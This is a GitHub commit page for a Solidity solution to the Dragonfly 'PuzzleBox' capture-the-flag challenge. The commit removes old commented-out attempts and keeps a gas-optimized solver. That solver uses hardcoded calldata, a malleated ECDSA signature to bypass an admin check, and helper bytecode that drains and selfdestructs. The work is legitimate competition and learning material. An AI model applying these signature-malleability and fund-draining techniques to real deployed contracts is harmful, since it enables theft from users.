Skip to content

Commit

Permalink
🗑️ Cleanup leaderboard solution
Browse files Browse the repository at this point in the history
  • Loading branch information
@smitrajput
smitrajput committed May 29, 2023
1 parent ab41abf commit 82ad516
Show file tree
Hide file tree
Showing 2 changed files with 43 additions and 191 deletions.
186 changes: 0 additions & 186 deletions src/PuzzleBoxSolution.sol
View file
Original file line number Diff line number Diff line change
Expand Up @@ -78,189 +78,3 @@ contract Operate {
}
}
}


// uint256[] memory inputArray2 = new uint256[](3);
// inputArray2[0] = 1;
// inputArray2[1] = 9;
// inputArray2[2] = 10;
// encodedDripIds = abi.encode(inputArray2);
// puzzle.torch(encodedDripIds);

// contract A {
// receive() external payable {}
// }

// contract AFactory {
// bytes32 constant salt = 0x7e99dadb0f9c9a21a0b0a07907baea686b2a2b0f1c8e0e480a390be5c2f5a5a5;

// function deployA() public {
// bytes memory bytecode = type(A).creationCode;
// assembly {
// let addr := create2(0, add(bytecode, 0x20), mload(bytecode), salt)
// if iszero(extcodesize(addr)) {
// revert(0, 0)
// }
// }
// }

// function computeAddress() public view returns (address) {
// bytes32 codehash = keccak256(type(A).creationCode);
// return address(uint160(uint(keccak256(abi.encodePacked(bytes1(0xff), address(this), salt, codehash)))));
// }
// }

// console.log('gasleft1', gasleft());
// puzzle.zip{gas: 1000000}();
// console.log('isValidDripId %s', 1, puzzle.isValidDripId(1));
// console.log('Puzzle eth', address(puzzle).balance);
// address nextAddr = 0x037eDA3aDb1198021A9b2e88C22B464fd38db3f4;

// AFactory factory = new AFactory();
// console.log('factory', address(factory));

// // deployA();
// console.log('deployedA', factory.computeAddress());
// console.logBytes(type(A).creationCode);
// console.log('next addr eth', nextAddr.balance);
// console.log('codeLength', nextAddr.code.length);


// // Step 3: Zip
// puzzle.zip();

// // Step 4: Creep
// puzzle.creep();

// // Step 5: Spread
// address payable[] memory friends = new address payable[](2);
// uint256[] memory friendsCutBps = new uint256[](friends.length);
// friends[0] = payable(0x416e59DaCfDb5D457304115bBFb9089531D873B7);
// friends[1] = payable(0xC817dD2a5daA8f790677e399170c92AabD044b57);
// friendsCutBps[0] = 0.015e4;
// friendsCutBps[1] = 0.0075e4;
// puzzle.spread(friends, friendsCutBps);

// // Step 6: Open the puzzle
// bytes memory adminSig = abi.encodePacked(
// hex"c8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8",
// hex"625cb970c2768fefafc3512a3ad9764560b330dcafe02714654fe48dd069b6df",
// hex"1c"
// );
// puzzle.open(0xc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8, adminSig);


// for(uint256 i = 1; i <= 572; i++) {
// puzzle.leak();
// }
// puzzle.creep();
// for(uint256 i = 1; i <= 6; i++) {
// puzzle.leak();
// }


///////////////////////////////////////////////////////////////////////////
// CleanPuzzleBoxSolution comments
///////////////////////////////////////////////////////////////////////////

// console.log('puzzle address', address(puzzle));
// vm.breakpoint("a");
// Helper operate = new Helper(puzzle);
// address(operate).call("");
// bytes memory selectoors = abi.encodePacked(
// puzzle.operate.selector,
// puzzle.leak.selector,
// puzzle.zip.selector,
// puzzle.creep.selector,
// // torch calldata
// hex"925facb100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000700000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000009",
// // spread calldata
// hex"2b071e47000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000001000000000000000000000000416e59dacfdb5d457304115bbfb9089531d873b70000000000000000000000000000000000000000000000000000000000000003000000000000000000000000c817dd2a5daa8f790677e399170c92aabd044b570000000000000000000000000000000000000000000000000000000000000096000000000000000000000000000000000000000000000000000000000000004b",
// // open calldata
// hex"58657dcfc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d800000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000041c8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d89da3468f3d897010503caed5c52689b959fbac09ff6879275a8279feffcc8a621b00000000000000000000000000000000000000000000000000000000000000"
// );

// add puzzle.leakCount to access set (i.e. make it warm)
// puzzle.leak(); ------------> assemblified above
// address(uint160(address(puzzle)) + uint160(2)) = 0x037EDA3AdB1198021A9B2e88C22B464Fd38DB3f5
// add puzzle + 2 to access set (i.e. make it warm) AND avoid the 25k value_to_empty_account_cost gas on calling zip()
// unchecked {
// payable(address(uint160(address(puzzle)) + uint160(2))).transfer(1); ------------> assemblified above
// }
// puzzle.zip(); ------------> assemblified above

// puzzle.creep{gas: 98000}(); ------------> assemblified above

// uint256[] memory n = new uint256[](6);
// assembly {
// mstore(add(n, 0x20), 2)
// mstore(add(n, 0x40), 4)
// mstore(add(n, 0x60), 6)
// mstore(add(n, 0x80), 7)
// mstore(add(n, 0xa0), 8)
// mstore(add(n, 0xc0), 9)
// }
// bytes memory encodedDripIds = abi.encode(n);

// // TODO: need to understand this calldata encoding scheme
// address(puzzle).call(hex"925facb100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000700000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000009");
// console.logBytes(abi.encodePacked(
// puzzle.torch.selector, uint256(0x01), uint8(0), encodedDripIds));

// assembly {
// pop(call(gas(), 0x037eDa3aDB1198021A9b2e88C22B464fD38db3f3, 0, add(selectoors, 0x30), 4, 0, 0))
// }


// address payable[] memory friends = new address payable[](1);
// uint256[] memory friendsCutBps = new uint256[](3);
// assembly {
// mstore(add(friends, 0x20), 0x416e59DaCfDb5D457304115bBFb9089531D873B7)
// mstore(add(friendsCutBps, 0x20), 0x00C817dD2a5daA8f790677e399170c92AabD044b57)
// mstore(add(friendsCutBps, 0x40), 150)
// mstore(add(friendsCutBps, 0x60), 75)
// }

// // puzzle.spread(friends, friendsCutBps);
// bytes memory spreadData = abi.encodeWithSelector(puzzle.spread.selector, friends, friendsCutBps);
// console.logBytes(spreadData);
// address(puzzle).call(hex"2b071e47000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000001000000000000000000000000416e59dacfdb5d457304115bbfb9089531d873b70000000000000000000000000000000000000000000000000000000000000003000000000000000000000000c817dd2a5daa8f790677e399170c92aabd044b570000000000000000000000000000000000000000000000000000000000000096000000000000000000000000000000000000000000000000000000000000004b");

// uint256 nonce = 0xc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8;
// // uint256 r = uint256(0xc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8);
// // S_THRESHOLD - uint256(0x625cb970c2768fefafc3512a3ad9764560b330dcafe02714654fe48dd069b6df)
// // = 71301600283128936764672812745529451294904726341347593422192209434084996057698
// uint256 s = 71301600283128936764672812745529451294904726341347593422192209434084996057698;
// uint8 v = 27;
// //= abi.encodePacked(nonce, s, v);
// bytes memory sign = abi.encodePacked(nonce, s, v);
// // assembly {
// // mstore(add(sign, 0x20), nonce)
// // mstore(add(sign, 0x40), s)
// // mstore(add(sign, 0x60), v)
// // }
// // puzzle.open(nonce, sign);
// console.logBytes(abi.encodeWithSelector(puzzle.open.selector, nonce, sign));
// address(puzzle).call(abi.encodeWithSelector(puzzle.open.selector, nonce, sign));

// NOTE: this costs 6k less gas
// puzzle.open(0xc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8,
// (
// hex"c8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8"
// hex"9da3468f3d897010503caed5c52689b959fbac09ff6879275a8279feffcc8a62"
// hex"1b"
// ));

// fallback() {
// if(address(this).balance != 337) {
// address(puzzle).call{value:101}(hex"9f678cca");
// // puzzle.drip{value: 101}();
// // console.logBytes4(bytes4(keccak256("drip()"))); //0x9f678cca
// } else {
// selfdestruct(payable(solution));
// }

// PuzzleBoxProxy(payable(0x037eDa3aDB1198021A9b2e88C22B464fD38db3f3)).lock(puzzle.torch.selector, false);

// console.logBytes4(bytes4(keccak256("operate()")));
// console.logBytes(abi.encodeWithSignature("lock(bytes4,bool)", hex"41c0e1a1", false));
48 changes: 43 additions & 5 deletions src/PBS_16152.sol → src/PuzzleBoxSolution_V1.sol
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,18 +2,25 @@ pragma solidity ^0.8.19;

import "./PuzzleBox.sol";

contract PuzzleBoxSolution {
/// This is the solution that put me to #6 on the (live) leaderboard: https://ctf.dragonfly.xyz/scores
contract PuzzleBoxSolution_V1 {

fallback() external payable {
// How close can you get to opening the box?
bytes memory selectoors = hex"7159a6188fd66f250091905511551052925facb1000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000007000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000092b071e47000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000001000000000000000000000000416e59dacfdb5d457304115bbfb9089531d873b70000000000000000000000000000000000000000000000000000000000000003000000000000000000000000c817dd2a5daa8f790677e399170c92aabd044b570000000000000000000000000000000000000000000000000000000000000096000000000000000000000000000000000000000000000000000000000000004b58657dcfc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d800000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000041c8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d89da3468f3d897010503caed5c52689b959fbac09ff6879275a8279feffcc8a621b00000000000000000000000000000000000000000000000000000000000000";

// Helper contract (commented-out below) bytecode without assembly optimizations
// bytes memory helperCode = hex"60c060405273037eda3adb1198021a9b2e88c22b464fd38db3f373ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250503373ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff168152505060805173ffffffffffffffffffffffffffffffffffffffff16637159a6186040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156100ca57600080fd5b505af11580156100de573d6000803e3d6000fd5b5050505073037eda3adb1198021a9b2e88c22b464fd38db3f373ffffffffffffffffffffffffffffffffffffffff1663deecedd463925facb160e01b60006040518363ffffffff1660e01b81526004016101399291906101c6565b600060405180830381600087803b15801561015357600080fd5b505af1158015610167573d6000803e3d6000fd5b505050506101ef565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b6101a581610170565b82525050565b60008115159050919050565b6101c0816101ab565b82525050565b60006040820190506101db600083018561019c565b6101e860208301846101b7565b9392505050565b60805160a0516101796102126000396000609e01526000600f01526101796000f3fe6080604052610151471461009c577f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1660656040516100529061012e565b60006040518083038185875af1925050503d806000811461008f576040519150601f19603f3d011682016040523d82523d6000602084013e610094565b606091505b5050506100d5565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff16ff5b005b600081905092915050565b7f9f678cca00000000000000000000000000000000000000000000000000000000600082015250565b60006101186004836100d7565b9150610123826100e2565b600482019050919050565b60006101398261010b565b915081905091905056fea26469706673582212208f094eb57682c27f678c08cf065a2df5b481a1c1e9514fcefff5890dd9318c1264736f6c63430008130033";

// dynamically stored bytecode
// bytes memory helperCode = type(Helper).creationCode;
//bytes memory helperCode = hex"60806040527f7159a618deecedd4925facb1000000000000000000000000000000000000000060005260008060046000807369209d8a7d258515ec9a4d25f7be1db85cb1b8265af1506000806044600460007369209d8a7d258515ec9a4d25f7be1db85cb1b8265af15060b3806100776000396000f3fe6080604052610151471460008114601b5760018114606457607b565b7f9f678cca000000000000000000000000000000000000000000000000000000006000526000806004600060657369209d8a7d258515ec9a4d25f7be1db85cb1b8265af150607b565b7369209d8a7d258515ec9a4d25f7be1db85cb1b828ff5b00fea26469706673582212200564873c553327d8b53135a7a550295299df669d78a88a2fc50132a93a963f7e64736f6c63430008130033";

// assembly-optimized bytecode
// bytes memory helperCode = hex"60806040527f7159a618deecedd4925facb1000000000000000000000000000000000000000060005260008060046000807369209d8a7d258515ec9a4d25f7be1db85cb1b8265af1506000806044600460007369209d8a7d258515ec9a4d25f7be1db85cb1b8265af15060b3806100776000396000f3fe6080604052610151471460008114601b5760018114606457607b565b7f9f678cca000000000000000000000000000000000000000000000000000000006000526000806004600060657369209d8a7d258515ec9a4d25f7be1db85cb1b8265af150607b565b7369209d8a7d258515ec9a4d25f7be1db85cb1b828ff5b00fea26469706673582212200564873c553327d8b53135a7a550295299df669d78a88a2fc50132a93a963f7e64736f6c63430008130033";

// assembly-optimized bytecode with compiler optimizations enabled to 1,000,000 runs
bytes memory helperCode = hex"608060405260006b7159a618deecedd4925facb160a01b81527369209d8a7d258515ec9a4d25f7be1db85cb1b826818260048485855af15081826044600485855af150505060aa806100526000396000f3fe60806040524761015114801560175760018114605d57005b7f9f678cca000000000000000000000000000000000000000000000000000000006000526000806004600060657369209d8a7d258515ec9a4d25f7be1db85cb1b8265af1005b7369209d8a7d258515ec9a4d25f7be1db85cb1b828fffea26469706673582212207d8240af97bb21dbf56dba721b468de6e8a15dc3dc21e7a0175cb7595a37898f64736f6c63430008130033";
// console.logBytes(helperCode);
// bytes memory helperCalldata = abi.encodePacked(helperCode, abi.encode(_puzzle));
// console.logBytes(helperCalldata);

assembly {
let helperAddr := create(0, add(helperCode, 0x20), mload(helperCode))
pop(call(gas(), helperAddr, 0, 0, 0, 0, 0))
Expand All @@ -35,4 +42,35 @@ contract PuzzleBoxSolution {
}
}

/* Commeted-out Helper contract, as its deployment bytecode is hardcoded above, to save gas */

// contract Helper {
// constructor() payable {
// // bytes memory data = hex"7159a618deecedd4925facb1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
// // console.logBytes4(bytes4(keccak256("torch(bytes)")));
// // console.logBytes(abi.encodeWithSignature("lock(bytes4,bool)", bytes4(keccak256("torch(bytes)")), false));
// assembly {
// mstore(0x00, hex"7159a618deecedd4925facb10000000000000000000000000000000000000000")
// // operate
// pop(call(gas(), 0x69209d8a7d258515eC9a4D25F7Be1dB85cB1B826, 0, 0x00, 4, 0, 0))
// // lock()
// pop(call(gas(), 0x69209d8a7d258515eC9a4D25F7Be1dB85cB1B826, 0, 0x04, 68, 0, 0))
// }
// }

// fallback() external payable {
// assembly {
// switch eq(selfbalance(), 337)
// case 0 {
// mstore(0, hex"9f678cca")
// pop(call(gas(), 0x69209d8a7d258515eC9a4D25F7Be1dB85cB1B826, 101, 0x00, 4, 0, 0))
// }
// case 1 {
// // warming puzzle + 2
// selfdestruct(0x69209d8a7d258515eC9a4D25F7Be1dB85cB1B828)
// }
// }
// }
// }


0 comments on commit 82ad516

Please sign in to comment.